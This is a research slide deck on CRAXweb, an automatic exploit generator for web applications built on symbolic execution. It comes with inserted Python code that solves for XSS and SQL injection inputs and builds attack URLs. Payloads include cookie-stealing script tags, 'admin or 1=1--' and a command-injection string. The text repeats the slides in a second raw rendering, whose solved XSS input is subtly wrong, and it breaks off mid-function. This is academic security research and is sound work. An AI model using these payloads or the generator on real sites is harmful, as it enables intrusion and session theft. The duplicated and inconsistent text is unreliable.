CRAXweb: Web Testing and
Attacks through “QEMU” in S2E
Shih-Kun Huang
National Chiao Tung University
Hsinchu, Taiwan
skhuang@cs.nctu.edu.tw
Motivation
• Symbolic execution is effective at crashing applications
– CatchConv, BitFuzz, TaintScope, and Ardilla (PHP)
– It should be equally effective for web testing

• Symbolic execution can also automate the exploit generation process
– AEG, MAYHEM, CRAX
– It should be feasible to automate web attack (exploit) generation
How Effective Is Automatic Exploit Generation for Non-web Applications?
Time for CRAX to turn a crash input into a working exploit:
• MPlayer (1.5 MLOC) (CVE-2008-0630)
– MPlayer 1.0rc2 and SVN before r25823
– 3.6 seconds

• Microsoft Office Word (CVE-2012-0158)
– Microsoft Office < 2010
– 216 seconds

• Nginx (CVE-2013-2028)
– nginx 1.3.9/1.4.0 stack buffer overflow
– 8 seconds
Problems of Symbolic Web Testing and Attacks
• Hard to implement a symbolic execution platform for the web
– MIT's Ardilla is not public and supports only PHP
– Many web platforms: PHP, JSP, Python, Perl, Ruby, ASP

• Variety of attack methods
– Non-web attacks: stack, heap, format string, integer, uninitialized use, race, …
– OWASP top attacks: injection, XSS, CSRF, …
Web Platform Independent Testing
• One symbolic execution engine for PHP, JSP, ASP, NodeJS, Python, Ruby, …?
– Run the whole stack (interpreter, web server, application) inside a QEMU-based symbolic execution engine -> S2E

• Issues
– Performance must be the primary consideration: the interpreter itself runs under symbolic execution, not just the application's own code
– Are symbolic semantics preserved? The web-language semantics must survive translation into the LLVM semantics that S2E executes.
Attack Independent Exploit Generation
• Taint analysis
– Track operations on input-tainted data

• Symbolic continuations (what happens next?)
– Symbolic program counter (symbolic EIP)
• Where the EIP points to

– Symbolic SQL query
• Where the SQL commands run

– Symbolic HTML response
• Where the JavaScript executes

– Symbolic command argument
• Where the shell commands run
The Power of Symbolic Computation
• Symbolic execution
– Generate test inputs by following all feasible branches

• Concolic execution
– Generate test inputs by following a concrete input's path and the branches along it

• Exploit generation
– Generate an exploit input by following a concrete crash/anomaly input's path and branching to the associated "shell code"
– Path constraint: collected from the crash input
– Continuation constraint: the symbolic "continuation" must branch to the shell code
Symbolic Execution
• Explore every possible path of a program
– Record path information in a path constraint

[Diagram: symbolic input -> a program -> path constraint 1, path constraint 2, path constraint 3]

2014/2/11

Liu Huan 劉歡 A Generic Web Testing
and Attack Generation Framework
Concolic Execution
• Begin with a random input
• Negate a branch of the recorded path constraint to generate the next input

[Diagram: input 1 -> a program -> output 1 and path constraint 1; negating a branch yields input 2 -> output 2 and path constraint 2; input 3 -> output 3 and path constraint 3; …]
Exploit Generation
• Record the path constraint of the given crash input

[Diagram: crash input x -> a program -> output y; the path constraint is recorded along the way]
Constraint Solving
• Given the program output y, constraint solving is the way to recover the input x

[Diagram: unknown input x -> a program -> output y; output y + path constraint -> solve constraint -> value of input x]
Constraint Solving
• If f(x) = 100, what is the value of x?
– Known output = 100, unknown input x

Sample code
    int f(int x) {
        int y = x + 10;
        if (y > 0)
            return y;
        else
            return y;
    }

– Use symbolic execution to get the path constraints
• PC of path 1: x + 10 > 0
• PC of path 2: x + 10 <= 0
– ∵ f(x) = y = x + 10 = 100
∴ Add the constraint from the known output: x + 10 = 100
– Solve the constraints
• Path 1: x + 10 > 0 and x + 10 = 100 -> x = 90
• Path 2: x + 10 <= 0 and x + 10 = 100 -> no solution
Constraint Solving
• What is the XSS exploit for the given sample code?

Sample code
    <?php
    $input = $_GET['id'];
    for ($i = 0; $i < strlen($input); $i++)
        echo chr(ord($input[$i]) + 1);
    ?>

– Symbolic request & response
HTTP Request (unknown input: the XSS attack string)
GET /index.php?id=[ input ] HTTP/1.1
Host: example.com

HTTP Response (known output: an alert script)
HTTP/1.1 200 OK
Content-Type: text/html

<html>
some text [ output ]
</html>

– Add the JavaScript code as the target characters
• output = <script>alert(document.cookie)</script>
– Solve the constraint: each output byte is chr(input[i] + 1), so each input byte is one less than the corresponding target byte
• input = ;rbqhos=`kdqs'cnbtldms-bnnjhd(;.rbqhos=
• Request: GET /index.php?id=;rbqhos=… (URL-encode the value when actually sending it)
• Response: <html> some text <script>alert(document.cookie)</script> </html>
Path Constraints
Input       Path constraint     Target output   Solved input
input[0]    chr(input[0]+1)     <               ;
input[1]    chr(input[1]+1)     s               r
input[2]    chr(input[2]+1)     c               b
input[3]    chr(input[3]+1)     r               q
input[4]    chr(input[4]+1)     i               h
input[5]    chr(input[5]+1)     p               o
input[6]    chr(input[6]+1)     t               s
input[7]    chr(input[7]+1)     >               =
input[8]    chr(input[8]+1)     a               `
input[9]    chr(input[9]+1)     l               k
…           …                   …               …
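The two constraint-solving walkthroughs above (f(x) = 100 on the C sample, and the XSS input for the chr(ord(c)+1) PHP loop) use one mechanism: collect the path constraint, add a constraint on the wanted output, solve for the input. The block below is an added example written for this page, not code from CRAXweb; it replaces the STP solver with plain enumeration, which suffices because every constraint here involves a single integer or a single byte. The helper names (solve, solve_f_equals, solve_xss_input, exploit_url), the search range for x, and the /index.php?id= request shape are this example's own assumptions.

```python
# Added example for this page, not code from CRAXweb: the "path constraint +
# known output -> input" step from the slides, with STP replaced by plain
# enumeration. Every constraint here involves one integer or one byte, so
# enumeration over the domain is an adequate solver for the demonstration.
from typing import Callable, Iterable, List, Optional, Tuple
from urllib.parse import quote

Constraint = Callable[[int], bool]


def solve(constraints: List[Constraint], domain: Iterable[int]) -> Optional[int]:
    """First value in `domain` satisfying every constraint, or None when the
    conjunction is unsatisfiable (the slide's 'No solution' verdict)."""
    for candidate in domain:
        if all(c(candidate) for c in constraints):
            return candidate
    return None


# Case 1, the C sample: int f(int x) { int y = x + 10; if (y > 0) ... }
# Path 1 carries the path constraint x + 10 > 0, path 2 carries x + 10 <= 0.
# Asking for f(x) == target adds the output constraint x + 10 == target.
# The search range for x is an assumption of this example.
def solve_f_equals(target: int,
                   domain: Iterable[int] = range(-1000, 1000)) -> Tuple[Optional[int], Optional[int]]:
    domain = list(domain)
    path1 = [lambda x: x + 10 > 0, lambda x: x + 10 == target]
    path2 = [lambda x: x + 10 <= 0, lambda x: x + 10 == target]
    return solve(path1, domain), solve(path2, domain)


# Case 2, the PHP sample: for each i, echo chr(ord($input[$i]) + 1).
# Each output byte depends on exactly one input byte, so the path constraint
# factors into one constraint per position: (input[i] + 1) mod 256 == target[i].
# PHP's chr() reduces its argument modulo 256, hence the mask.
def php_shift_byte(b: int) -> int:
    return (b + 1) & 0xFF


def solve_xss_input(target_output: str,
                    transform: Callable[[int], int] = php_shift_byte) -> Optional[bytes]:
    """Solve byte by byte for an input whose echoed output equals
    `target_output`; None if some target byte has no pre-image."""
    solved = bytearray()
    for t in target_output.encode():
        x = solve([lambda b, t=t: transform(b) == t], range(256))
        if x is None:
            return None
        solved.append(x)
    return bytes(solved)


def exploit_url(target_output: str) -> Optional[str]:
    """The request from the slide, with the solved bytes URL-encoded so that
    ';', '=' and friends survive query-string parsing (path /index.php assumed)."""
    payload = solve_xss_input(target_output)
    if payload is None:
        return None
    return "/index.php?id=" + quote(payload, safe="")


if __name__ == "__main__":
    print(solve_f_equals(100))       # (90, None): path 2 cannot return 100
    print(solve_xss_input("<script>alert(document.cookie)</script>"))
    print(exploit_url("<script>alert(document.cookie)</script>"))
```

The path-2 result is None, which is the "No solution" verdict on the slide: the output constraint contradicts that path's constraint, so no input along path 2 returns 100. For the XSS case the solved bytes are URL-encoded before they go into the query string; the slide prints them raw.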
Exploit Generation of a Single URL
• This method can check the security risk of a single URL
– XSS: the symbolic HTTP response must contain the target script
HTTP/1.1 200 OK
Content-Type: text/html

<html>
some text <script>alert(document.cookie)</script>
</html>

– SQL injection: the symbolic query reaching mysql_query must become the target query
SELECT * FROM user WHERE user=[symbolic]
target: admin or 1=1--
Exploit Generation
• Generate exploits for a whole web application
Single Path Concolic Execution
• Reduces the overhead of symbolic execution
– Symbolic execution: explore all possible paths
GET /index.php?abc=[ symbolic ] HTTP/1.1
Host: 123.123.123.123

– Single path concolic execution: only explore the path taken by the given concrete input
GET /index.php?abc=[AAAAA] HTTP/1.1
Host: 123.123.123.123
Restriction
Outline
• Introduction
• Background
• Method
– Exploit Generation
– System Architecture

• Related Work
• Evaluation
• Conclusion and Future Work
System Architecture
• Symbolic environment on S2E
• CRAXWeb architecture
• CRAX framework
• Details of CRAXWeb
– Web crawler
– Symbolic request sender
– Symbolic data sensor
– Exploit generator
S2E (Selective Symbolic Execution)
[Diagram: the symbolic data sender injects symbolic data into the guest; when it reaches a sink, the exploit generator is invoked]

[Diagram, XSS case: symbolic data sender -> guest -> symbolic data sensor on the HTTP response -> exploit generator]

[Diagram, SQL injection case: symbolic data sender -> guest -> symbolic data sensor on the SQL query -> exploit generator]
CRAXWeb Architecture
[Diagram]
Server side (test unit): S2E on QEMU runs the web server and the web application; the symbolic data sensor and the s2e_myop hooks sit inside the guest and talk over the symbolic socket.
Client side: the web crawler feeds the symbolic request sender, which sends requests through the symbolic socket to the web server; the exploit generator uses the STP solver and writes the report.
CRAX Framework
[Figure]
Web Crawler (Burp Suite)
[Diagram: the architecture with the web crawler highlighted]
• The crawler (Burp Suite) walks the web application and stores every request it finds in a database, e.g.:
GET /index.php?abc=xxxxx HTTP/1.1
Host: example.com

POST /index.php HTTP/1.1
Host: example.com
Content-Length: 12

a=xxxx&b=xxx
Symbolic Request Sender
[Diagram: the architecture with the symbolic request sender highlighted]

Symbolic Data Sender
[Diagram]
1. The control node takes a crawled request from the database and sends it to the web application as the experiment request, with the chosen parameter marked symbolic
2. The web application's experiment response is returned to the control node
Symbolic Data Sensor
[Diagram: the architecture with the symbolic data sensor highlighted]

• The sensor sits where sensitive data is consumed; if that data is symbolic, the sensor calls the exploit generator

Web security issue   Sensor location
XSS                  HTTP response
SQL injection        mysql_query()
…                    …
Other Web Security Issues
Issue                    Sensor location (PHP)               Sensor location (Python)
Remote file inclusion    include(), include_once() …         include(), require() …
Directory traversal      fopen(), file() …                   open() …
Command injection        system(), file() …                  system(), exec() …
Code injection           eval() …                            eval() …
File upload              move_uploaded_file(), rename(), …   open() …
Exploit Generator
[Diagram: the architecture with the exploit generator highlighted]

[Figure: exploit generator internals]
Exploit Generator
• Sensor hit: mysql_query receives SELECT * FROM user WHERE user=[symbolic] …

Sample code
    <?php
    $input = base64_decode($_GET['user']);
    mysql_query("SELECT * FROM user
        WHERE user=" . $input);
    ?>

• Generated exploit: x.php?user=YWRtaW4gb3Ig… (the solver drives the symbolic query back through base64_decode, so the request carries the base64 encoding of the target payload)
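The sensor-location tables above and the base64 SQL-injection page form one pipeline: a concrete probe request runs, a sensor at a sink (mysql_query(), system(), …) notices that its argument is symbolic, and the exploit generator solves for the parameter value that turns the sink's argument into the attack string. The block below is an added example for this page, not CRAXweb code: instead of S2E's in-guest hooks it models a symbolic value as a Python object that records each operation together with its inverse, and "solving" means undoing those operations from the wanted sink value back to the request parameter. The Sym and SinkHit classes, the sensor() and attack() helpers, the probe values, the ping_page with its system() sink and the x.php request shape are this example's assumptions; the sample page, the sink names and the SQL payload come from the slides.

```python
# Added example for this page, not CRAXweb's own code: a toy model of the
# symbolic data sensor and the exploit generator. A symbolic value records the
# request parameter it came from and every operation applied to it, paired
# with that operation's inverse; a sensor at a sink raises when its argument
# is symbolic; the generator undoes the recorded operations from the wanted
# sink value back to a request parameter value.
import base64
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import quote

Inverse = Callable[[bytes], Optional[bytes]]   # None: no pre-image exists


@dataclass
class Sym:
    param: str                                   # request parameter of origin
    concrete: bytes                              # value on the concrete probe run
    ops: List[Tuple[str, Inverse]] = field(default_factory=list)

    def apply(self, name: str, fwd: Callable[[bytes], bytes], inv: Inverse) -> "Sym":
        return Sym(self.param, fwd(self.concrete), self.ops + [(name, inv)])


# PHP built-ins used by the sample page, modelled on symbolic values
def base64_decode(v: Sym) -> Sym:
    return v.apply("base64_decode", base64.b64decode, base64.b64encode)


def concat(prefix: bytes, v: Sym) -> Sym:
    """prefix . $input; a pre-image exists only if the wanted value keeps the prefix."""
    return v.apply("concat",
                   lambda b: prefix + b,
                   lambda b: b[len(prefix):] if b.startswith(prefix) else None)


class SinkHit(Exception):
    """Raised by a sensor when symbolic data reaches a sink."""
    def __init__(self, sink: str, value: Sym):
        super().__init__(sink)
        self.sink, self.value = sink, value


def sensor(sink: str, arg):
    """Sensor placed at a sink: a symbolic argument is handed to the generator."""
    if isinstance(arg, Sym):
        raise SinkHit(sink, arg)
    return arg


def mysql_query(query: bytes) -> str:          # SQL injection sink
    return "rows for " + sensor("mysql_query", query).decode()


def system(cmd: bytes) -> str:                 # command injection sink
    return "ran " + sensor("system", cmd).decode()


def generate_exploit(hit: SinkHit, wanted_sink_value: bytes) -> Optional[str]:
    """Undo the recorded operations, last first, to find the parameter value
    that makes the sink see `wanted_sink_value`; None if unsatisfiable.
    The x.php request shape is an assumption of this example."""
    value: Optional[bytes] = wanted_sink_value
    for _name, inverse in reversed(hit.value.ops):
        value = inverse(value)
        if value is None:
            return None
    return "x.php?%s=%s" % (hit.value.param, quote(value, safe=""))


# The PHP page from the slide, transcribed into the model:
#   $input = base64_decode($_GET['user']);
#   mysql_query("SELECT * FROM user WHERE user=" . $input);
def sample_page(get: Dict[str, bytes]) -> str:
    inp = base64_decode(Sym("user", get["user"]))
    return mysql_query(concat(b"SELECT * FROM user WHERE user=", inp))


# A second, assumed page with a command sink, to show the same sensor at
# another location:  system("ping -c 1 " . $_GET['host']);
def ping_page(get: Dict[str, bytes]) -> str:
    return system(concat(b"ping -c 1 ", Sym("host", get["host"])))


def attack(page, param: str, probe: bytes, wanted_sink_value: bytes) -> Optional[str]:
    """One concrete probe run of `page`; if a sensor fires, solve for the
    parameter value that yields `wanted_sink_value` at that sink."""
    try:
        page({param: probe})
    except SinkHit as hit:
        return generate_exploit(hit, wanted_sink_value)
    return None          # no symbolic data reached a sink on this path


if __name__ == "__main__":
    print(attack(sample_page, "user", b"YWRtaW4=",          # probe: base64("admin")
                 b"SELECT * FROM user WHERE user=admin or 1=1--"))
    # x.php?user=YWRtaW4gb3IgMT0xLS0%3D
    print(attack(ping_page, "host", b"127.0.0.1", b"ping -c 1 127.0.0.1; id"))
```

The concat inverse returns None when the wanted sink value does not keep the page's concrete prefix, so a target such as DROP TABLE user is reported as unsatisfiable instead of producing a bogus request; in the real framework that is the solver finding no model for the path constraint. The probe run is the single-path concolic execution from the earlier slide: only the operations on the path the probe actually takes are recorded.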
Outline
• Introduction
• Background
• Method
• Related Work
• Evaluation
• Conclusion and Future Work
Front End Interface
[Screenshots]

Experiment Monitor
[Screenshot: the CRAX Web front end alongside the guest QEMU]

Generated Exploit
[Screenshot]

Exploit Validation
[Screenshots]
Evaluation for Web Platform Independence
Test case ≈ echo("A" x 50); OT = timeout (>= 12 hr)

                         PHP             JSP             Rails        Django         ASP
Framework                -               -               3.2          0.96.1         -
OS                       Linux           Linux           Linux        Linux          Windows
Server                   Apache-2.2.19   Tomcat-7.0.2    Webrick      Built-in       IIS-5.1
Kernel (runtime)         PHP-5.3.6       JDK-7u2         Ruby-1.9.3   Python-2.6.6   ASP-3.0
Bind port                80              8080            3000         8000           80
Symbolic response time   18.50s          6.72min         7.45min      32.72s         OT
Without constraints      16.42s          3.25min         5.62min      24.02s         OT
Evaluation for XSS
OT = timeout (>= 15 min)

Test case           LOC     # crawled   # XSS          # XSS    Time per   Time for all
                            requests    (vulnerable)   by MIT   exploit    crawled requests
Schoolmate-1.5.4    8,125   452         19             14       0.30min    107.78min + 30 OT
Webchess-1.0.0rc2   6,504   410         5 (4)          13       0.80min    94.38min + 313 OT
Faqforge-1.3.2      1,710   28          4              4        0.20min    5.74min
EVE                 904     12          2              2        0.42min    4.94min

Test case             LOC       Platform   # crawled   # XSS          Time per   Time for all
                                           requests    (vulnerable)   exploit    crawled requests
SimpGB-1.49.02        41,296    PHP        1,299       33 (57)        0.91min    7.67hr + 334 OT
DedeCms-5.6           84,544    PHP        1,111       11 (13)        0.48min    8.32hr + 9 OT
Django-admin-0.96.1   3,558     Python     5           1              5.29min    5.29min + 4 OT
Discuz!-6.0           67,088    PHP        613         0 (1)          0.85min    8.37hr + 12 OT
Joomla-1.6            253,711   PHP        215         0 (7)          2.17min    1.26hr + 117 OT
Evaluation for SQL Injection
TO = timeout

                              Schoolmate   Webchess   Faqforge   EVE        Testlink            phprecipebook
                              1.5.4        1.0.0rc2   1.3.2                 1.8.4               2.24
Line of code                  8125         6504       1710       904        144913              52631
CVE                           -            -          -          -          2009-4238           2009-4883
# crawled requests            269          65         7          9          218                 65
# SQLi (vulnerable)           12           6          3          3          9                   6
# SQLi by MIT                 6            12         1          2          -                   -
Time per exploit              0.55 min     0.39 min   0.27 min   0.24 min   3.24 min            4.89 min
Time for all crawled reqs     148.58 min   25.15 min  1.88 min   2.12 min   706.4 min (30 TO)   315.2 min (32 TO)
# of all solved constraints   952          15254      1104       934        18047               6322
Outline
• Introduction
• Background
• Method
• Related Work
• Evaluation
• Conclusion and Future Work
Automatic Web Attack Generators
• Based on symbolic execution
– White box
– Each supports only a specific language

• Based on the server's responses
– Black box
– Hard to handle encoded or encrypted data, since the generator cannot see the transformation the application applies to its input
Related Work
Approach        Year   Attacks / detected         Generation algorithm                                            W/B box   Platform
SAFELI          2008   SQLI attack                Statically inspects the application bytecode                    WB        Java
Apollo          2008   Malformed HTML detection   Concolic execution to find bugs in PHP web applications         WB        PHP
Ardilla         2009   XSS, SQLI attack           Combines concrete and symbolic execution to cover paths         WB        PHP
Kudzu           2010   XSS, SQLI attack           Attack grammar and symbolic execution                           WB        JavaScript
PIUIVT          2010   XSS, SQLI attack           Perturbation-based algorithm                                    WB        Java
MySQLInjector   2011   SQLI attack                Blind SQL injection based on true/false and ORDER BY            BB        PHP
NKSI Scan       2012   SQLI attack                Modularized SQL injection patterns to generate attack strings   BB        JSP, ASP
CRAX Web        2012   XSS, SQLI attack           Single path symbolic execution                                  WB        XSS: all; SQLI: PHP
Conclusion
• A framework to generate exploits for web applications
– Supports XSS and SQL injection

[Diagram: web application -> CRAX Web -> vulnerability report]

• A successful trial of symbolic execution for the web with S2E
Future Work
• Apply this structure to other kinds of exploit generation

Other web security issue                        Target functions
Remote file inclusion / local file inclusion    include(), include_once(), require(), require_once() …
Directory traversal                             fopen(), file(), unlink() …
Command injection                               system(), file() …
Code injection                                  eval() …
File upload                                     move_uploaded_file(), rename(), …
Open Doors to More Work
• Symbolic Executions by S2E for
– PHP, Python
– JSP, Ruby
– ASP, Perl
– Node JS

CRAXweb: Automatic web application testing and attack generation

  • 1. CRAXweb: Web Testing and Attacks through “QEMU” in S2E Shih-Kun Huang National Chiao Tung University Hsinchu, Taiwan skhuang@cs.nctu.edu.tw
  • 2. Motivation • Symbolic Execution is effective to crash applications – Catchconv, Bitfuzz, Taintscope, and Ardilla (PHP) – Should be effective for Web Testing • Symbolic Execution can also automate exploit generation process – AEG, MAYHEM, CRAX – Should be feasible to automate Web Attack (exploit) generation
  • 3. How Effective of Automatic Exploit Generation for non-web applications • Mplayer (1.5MLOC) (CVE-2008-0630) – MPlayer 1.0rc2 and SVN before r25823 – 3.6 seconds • Microsoft Office Word (CVE-2012-0158) – Microsoft Office < 2010 – 216 seconds • Nginx (CVE-2013-2028) – nginx 1.3.9/1.4.0 stack buffer overflow – 8 seconds
  • 4. Problems of Symbolic Web Testing and Attacks • Hard to Implement Symbolic Execution Platform for Web – MIT’s Ardilla not in public and only for PHP – Various number of Web platforms: PHP, JSP, Python, Perl, Ruby, ASP • Variety of Attack Methods – Non-web attacks: stack, heap, format, integer, uninitialized uses, race,… – OWASP top attacks: injection, XSS, CSRF,…
  • 5. Web Platform Independent Testing • (PHP,JSP,ASP,NodeJS,Python,Ruby,…) symbolic execution engine ? – QEMU–based symbolic execution engine -> S2E • Issues – Performance should be the primary consideration – Will symbolic semantics be preserved ? Across between Web semantics and llvm semantics.
  • 6. Attack Independent Exploit Generation • Taint Analysis – Input tainted operations • Symbolic Continuations (what to do next ?) – Symbolic program counter (Symbolic EIP) • Where the EIP points to – Symbolic SQL query • Where the SQL commands run – Symbolic HTML response • Where the Javascript executes – Symbolic command argument • Where the shell commands run
  • 7. The power of Symbolic Computation • Symbolic Execution – Generating Testing input, following all feasible branches • Concolic Execution – Generating Testing input, following a concrete input path and the associated branches • Exploit Generation – Generating Exploit input, following a concrete Crash/Anomaly input path and branch to the associated “shell code” – Path Constraint generated by the crash input – Constraints of Symbolic “continuations” branching to the shell code
  • 8. Symbolic Execution • Explore every possible path of a program – Record path information in path constraint Path constraint 1 Symbolic input A program Path constraint 2 Path constraint 3 2014/2/11 Liu Huan 劉歡 A Generic Web Testing and Attack Generation Framework 8
  • 9. Concolic Execution • Begin with a random input • Use false path constraint to generate another input case Output1 Input 1 Path constraint 1 Input 2 A program Output2 Path constraint 2 Output3 Input 3 Path constraint 3 …… 2014/2/11 Liu Huan 劉歡 A Generic Web Testing and Attack Generation Framework …… 9
  • 10. Exploit Generation • Record the path constraint of the given crash input Crash Input: x A program Output: y Path constraint 2014/2/11 Liu Huan 劉歡 A Generic Web Testing and Attack Generation Framework 10
  • 11. Constraint Solving Unknown input: x A program Output: y Path constraint • Given program output y, constraint solving is the way to generate input x Output: y + Solve constraint Value of input x Path constraint 11
  • 12. Constraint Solving • If f(x) = 100, what’s the value of x? Known output =100 Unknown input: x Sample code 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 12
  • 13. Constraint Solving • If f(x) = 100, what’s the value of x? – Use symbolic execution to get path constraint Sample code PC of path 1 Path constraint PC of path 2 X+10 > 0 X+10 <= 0 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 13
  • 14. Constraint Solving • If f(x) = 100, what’s the value of x? – Use symbolic execution to get path constraint – ∵ f(x) = y = X+10 = 100 Known output =100 ∴ Add path constraint X + 10 = 100 Sample code PC of path 1 PC of path 2 Path constraint X+10 > 0 X+10 <= 0 Add constraint from known information X+10 = 100 X + 10 = 100 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 14
  • 15. Constraint Solving • If f(x) = 100, what’s the value of x? – Use symbolic execution to get path constraint – ∵ f(x) = y = X+10 = 100 Known output =100 ∴ Add path constraint X + 10 = 100 – Solve the constraint • x = 90 Sample code input: x=90 PC of path 1 PC of path 2 Path constraint X+10 > 0 X+10 <= 0 Add constraint from known information X+10 = 100 X + 10 = 100 Constraint solving X = 90 No solution 1 int f(x){ 2 int y=x+10; 3 if (y >0) 4 return y; 5 else 6 return y; 7 } 15
  • 16. Constraint Solving • What’s the XSS exploit of the given sample code? Sample code 1 <?php 2 $input = $_GET['id']; 3 for($i=0; $i<strlen($input); $i++) 4 echo chr(ord($input[$i])+1); 5 ?> 16
  • 17. Constraint Solving • What’s the XSS exploit of the given sample code? – Symbolic request & response HTTP Request Unknown input (XSS attack) GET /index.php?id=[ input ] HTTP/1.1 Host: example.com HTTP Response Known output (an alert script) HTTP/1.1 200 OK Context-type: text/html Sample code <html> some text [ output ] </html> 1 <?php 2 $input = $_GET['id']; 3 for($i=0; $i<strlen($input); $i++) 4 echo chr(ord($input[$i])+1); 5 ?> 17
  • 18. Constraint Solving • What’s the XSS exploit of the given sample code? – Symbolic request & response – Add JavaScript code as target character • output = <script>alert(document.cookie)</script> HTTP Response ;rbqhos=… HTTP Request GET /index.php?id=[ input ] HTTP/1.1 Host: example.com Sample code <script>… 1 <?php 2 $input = $_GET['id']; 3 for($i=0; $i<strlen($input); $i++) <html> some text [ output ] 4 echo chr(ord($input[$i])+1); </html> 5 ?> HTTP/1.1 200 OK Context-type: text/html 18
• 19. Constraint Solving
• What's the XSS exploit of the given sample code?
– Symbolic request & response
– Add JavaScript code as the target characters
 • output = <script>alert(document.cookie)</script>
– Solve the constraint
 • input = ;rbqhos=`kds'cnbtldms-bnnjhd(;,rbqhos=

HTTP Request:

    GET /index.php?id=;rbqhos=… HTTP/1.1
    Host: example.com

HTTP Response:

    HTTP/1.1 200 OK
    Content-type: text/html

    <html> some text <script>… </html>

Sample code: as on slide 16.
• 20. Path Constraints

    Input      Path constraint      Target output   Solved input
    input[0]   chr(input[0]+1)      <               ;
    input[1]   chr(input[1]+1)      s               r
    input[2]   chr(input[2]+1)      c               b
    input[3]   chr(input[3]+1)      r               q
    input[4]   chr(input[4]+1)      i               h
    input[5]   chr(input[5]+1)      p               o
    input[6]   chr(input[6]+1)      t               s
    input[7]   chr(input[7]+1)      >               =
    input[8]   chr(input[8]+1)      a               `
    input[9]   chr(input[9]+1)      l               k
    …          …                    …               …
• 21. Exploit Generation of Single URL
• This method can check the security risk of a single URL
– XSS sink: the HTTP response

    HTTP/1.1 200 OK
    Content-type: text/html

    <html> some text [ output ] </html>      [ output ] = <script>alert(document.cookie)</script>

– SQL injection sink: mysql_query

    SELECT * FROM user WHERE user=[symbolic]  [symbolic] = admin or 1=1--
• 22. Exploit Generation
• Generate an exploit of a web application
• 23. Single Path Concolic Execution
• In order to reduce the overhead of symbolic execution
– Symbolic execution: explore all possible paths (the parameter value is fully symbolic)

    GET index.php?abc=[ symbolic ] HTTP/1.1
    Host: 123.123.123.123

– Single path concolic execution: only explore the path of the given concrete input

    GET index.php?abc=[AAAAA] HTTP/1.1
    Host: 123.123.123.123
• 25. Outline
• Introduction
• Background
• Method
– Exploit Generation
– System Architecture
• Related Work
• Evaluation
• Conclusion and Future Work
• 26. System Architecture
• Symbolic Environment on S2E
• CRAXWeb Architecture
• CRAX Framework
• Detail of CRAXWeb
– Web Crawler
– Symbolic Request Sender
– Symbolic Data Sensor
– Exploit Generator
• 27. S2E (Selective Symbolic Execution)
(diagram: Symbolic data sender -> S2E -> Exploit generator)
• 28. S2E (Selective Symbolic Execution)
(diagram, for the XSS attack: Symbolic data sender -> S2E -> Symbolic data sensor -> Exploit generator)
• 29. S2E (Selective Symbolic Execution)
(diagram, for the SQL injection attack: Symbolic data sender -> S2E -> Symbolic data sensor -> Exploit generator)
• 30. CRAXWeb Architecture
(architecture diagram)
– Test unit (client): Web crawler -> Symbolic request sender -> Sym. socket; Symbolic data sensor (s2e_myop) -> Exploit generator (STP solver) -> Report
– S2E QEMU (server): Sym. socket -> Web server -> Web application -> Symbolic data sensor (s2e_myop)
• 32. Web Crawler
(architecture diagram as on slide 30, with the Web crawler highlighted)
• 33. Web Crawler (Burp Suite)
(diagram: Web application -> Web crawler -> Database of crawled requests)

Crawled requests, for example:

    GET index.php?abc=xxxxx HTTP/1.1
    Host: example.com

    POST index.php HTTP/1.1
    Host: example.com
    Content-length: 40

    a=xxxx&b=xxx
• 34. Symbolic Request Sender
(architecture diagram as on slide 30, with the Symbolic request sender highlighted)
• 35. Symbolic Data Sender
(diagram: Web crawler -> Database -> Control node; Control node -> 1. experiment request -> Symbolic data sender -> Web application; Web application -> 2. experiment response -> Symbolic data sender -> Control node)
2014/2/11
• 36. Symbolic Data Sensor
(architecture diagram as on slide 30, with the Symbolic data sensor highlighted)
• 37. Symbolic Data Sensor
– Sensitive data flows into the symbolic data sensor; if it is symbolic data, the sensor calls the exploit generator

    Web security issue   Sensor location
    XSS                  HTTP response
    SQL injection        mysql_query()
    …                    …
• 38. Other Web Security Issues

    Issue                   Sensor location (PHP)                Sensor location (Python)
    Remote file inclusion   include(), include_once() …          include(), require() …
    Directory traversal     fopen(), file() …                    open() …
    Command injection       system(), file() …                   system(), exec() …
    Code injection          eval() …                             eval() …
    File upload             move_uploaded_file(), rename(), …    open() …
• 39. Exploit Generator
(architecture diagram as on slide 30, with the Exploit generator highlighted)
• 41. Exploit Generator
– Sink: SELECT * FROM user WHERE user=[symbolic]   (the tail of the query is symbolic)

Sample code:

    <?php
    $input = base64_decode($_GET['user']);          // decoded bytes stay symbolic
    mysql_query("SELECT * FROM user WHERE user=" . $input);
    ?>

Generated request: x.php?user=YWRtaW4gb3Ig...
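The sensor-to-generator hand-off of slide 37 applied to the slide-41 sample, as an added example that is not CRAXweb's code: S2E tracks symbolic bytes at the machine level, so this toy instead carries a per-character "derived from the request" flag (class Sym, and the function names, are chosen here) through base64_decode and the string concatenation, lets a sensor at the mysql_query() sink report the symbolic region of the query, and, because base64 is invertible, obtains the request value by encoding the payload the slide shows rather than by calling STP.

```python
"""Symbolic data sensor at a sink (mysql_query) and hand-off to the exploit
generator, for the slide-41 sample.  Added example, not CRAXweb code: a per-
character 'derived from request input' flag stands in for S2E's symbolic bytes."""
import base64
from dataclasses import dataclass, field
from typing import List, Tuple

@dataclass
class Sym:
    """A string plus one flag per character (True = derives from the request)."""
    text: str
    sym: List[bool] = field(default_factory=list)
    def __post_init__(self) -> None:
        if not self.sym:                       # PHP string literals are concrete
            self.sym = [False] * len(self.text)

    def __add__(self, other: "Sym") -> "Sym":  # PHP '.' concatenation keeps flags aligned
        return Sym(self.text + other.text, self.sym + other.sym)

def get_param(value: str) -> Sym:
    """$_GET['user'] as received: every character is attacker-controlled."""
    return Sym(value, [True] * len(value))

def php_base64_decode(s: Sym) -> Sym:
    """Model of base64_decode(): each output byte depends on the input, so a
    symbolic input yields a fully symbolic output."""
    out = base64.b64decode(s.text).decode("latin-1")
    return Sym(out, [any(s.sym)] * len(out))

def sensor_mysql_query(query: Sym) -> List[Tuple[int, int]]:
    """Sensor at the mysql_query() sink: (start, end) of each symbolic run;
    an empty list means the query is fully concrete, nothing to generate."""
    runs, start = [], None
    for i, flag in enumerate(query.sym + [False]):  # sentinel closes a trailing run
        if flag and start is None:
            start = i
        elif not flag and start is not None:
            runs.append((start, i))
            start = None
    return runs

def generate_exploit(payload: str) -> str:
    """Constraint: base64_decode(user) == payload.  base64 is invertible, so the
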